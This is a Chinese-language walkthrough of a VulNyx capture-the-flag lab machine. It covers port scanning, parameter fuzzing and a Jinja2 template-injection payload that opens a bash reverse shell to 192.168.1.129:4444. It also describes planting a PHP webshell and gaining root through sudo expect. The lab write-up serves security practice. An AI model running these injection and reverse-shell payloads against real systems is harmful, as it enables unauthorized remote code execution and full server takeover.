首页 靶场练习 VulNyx Easy

# 靶场搭建

下载:Flash

Nat,IP: 192.168.1.138

# 渗透测试

# 信息初收集

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http       nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html).
8080/tcp open  http-proxy Werkzeug/2.3.4 Python/3.9.2
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/2.3.4 Python/3.9.2
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 NOT FOUND
|     Server: Werkzeug/2.3.4 Python/3.9.2
|     Date: Thu, 23 May 2024 02:13:10 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 207
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.3.4 Python/3.9.2
|     Date: Thu, 23 May 2024 02:13:10 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 18
|     Connection: close
|     <h2>Love you!</h2>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.3.4 Python/3.9.2
|     Date: Thu, 23 May 2024 02:13:10 GMT
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, HEAD, GET
|     Content-Length: 0
|     Connection: close
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|     </html>
|   Socks5: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request syntax ('
|     ').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>

python 的网站,怀疑是模板注入,所以需要 fuzz 一下参数

┌──(root㉿kali)-[~]
└─# wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.1.138:8080/?FUZZ=36' --hh=18
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://192.168.1.138:8080/?FUZZ=<!--swig1-->
Total requests: 4727
=====================================================================
ID           Response   Lines    Word       Chars       Payload                                  
=====================================================================
000002804:   200        0 L      2 W        17 Ch       "name"                                   
Total time: 0
Processed Requests: 4727
Filtered Requests: 4726
Requests/sec.: 0
拿到了 name 这个参数,尝试注入: {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }} 得到回显
弹 shell 出来: http://192.168.1.138:8080/?name={{%20self.__init__.__globals__.__builtins__.__import__(%27os%27).popen(%27bash+-c+%22bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.1.129%2f4444+0%3e%261%22%27).read()%20}}
payload 要进行 URL 编码!
# 提权
sudo -l 后发现 ccal,尝试了一下没有利用方法
ps -ef 看了一眼,randy 这个感觉是个兔子洞,所以重新回归 www,传入一个 php 的马到 www 下
访问之后发现变成了下载,没有解析。看下配置文件吧: /etc/nginx/sites-available/default
发现里面有个: server_name loveyouuuuu.nyx;
添加到 host 解析中,再去触发 shell.php,拿到返回的 shell
expect 有 sudo 权限
sudo expect -c 'spawn /bin/sh;interact' 拿到 root